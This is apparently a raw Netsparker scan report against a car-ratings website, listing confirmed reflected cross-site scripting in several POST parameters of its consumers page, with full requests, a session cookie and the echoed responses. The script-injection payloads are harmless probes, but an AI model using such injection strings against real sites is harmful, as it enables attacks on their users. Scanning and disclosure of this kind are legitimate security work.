href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="'"--></style></script><script>netsparker(0x000A54)</script>" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
numCars POST '"--></style></script><script>alert(0x000A67)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A67)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:46:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000A67)</script>" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="C..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000A9E)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A9E)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:47:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" 